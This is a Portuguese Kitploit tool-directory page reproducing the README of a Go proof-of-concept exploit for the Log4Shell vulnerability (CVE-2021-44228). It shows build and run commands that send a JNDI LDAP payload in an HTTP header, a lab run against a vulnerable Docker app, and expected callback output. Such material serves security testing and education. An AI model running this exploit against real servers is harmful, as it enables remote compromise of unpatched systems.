Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-44228 — Um simples PoC Log4j escrito em Go | Kitploit
Ferramentas/GitHubGitHub/sorrence/cve-2021-44228
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubsorrence/cve-2021-44228

CVE-2021-44228

Um simples PoC Log4j escrito em Go

Ver Repositório
há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-44228 PoC (Log4Shell)

⚠️ Aviso:
Esta ferramenta destina-se apenas a fins educacionais, pesquisa de segurança e ambientes de teste controlados.
Usá-la contra sistemas sem permissão explícita é ilegal e de total responsabilidade do utilizador.


📌 Descrição

Este projeto contém um Proof-of-Concept (PoC) simples para a vulnerabilidade Apache Log4j2 (CVE-2021-44228).
O PoC envia um cabeçalho HTTP especialmente criado com um payload JNDI LDAP para o alvo.
Se o alvo for vulnerável, enviará um callback para o endereço LHOST especificado.


🚀 Uso

1️⃣ Compilar

root@kitploit:~
go build -o exploit exploit.go

2️⃣ Executar

root@kitploit:~
sudo ./exploit -r "http://<TARGET_URL>/?search=test" -l <LOCAL_IP>
  • -r → URL do alvo (endpoint da aplicação vulnerável)
  • -l → Endereço IP do seu listener de callback (a máquina a executar o PoC)

🛠️ Exemplo

Usando a aplicação vulnerável Docker fornecida:

root@kitploit:~
# Executar a app vulnerável
docker run --rm --network host ghcr.io/christophetd/log4shell-vulnerable-app

# Executar o exploit
sudo ./exploit -r "http://127.0.0.1:8080/?search=test" -l 127.0.0.1

Saída esperada:

root@kitploit:~
[*] Callback started on 1389
[*] Payload sent! HTTP Status: 200
[*] Callback from 127.0.0.1:56789, target is VULNERABLE
Baixar ferramenta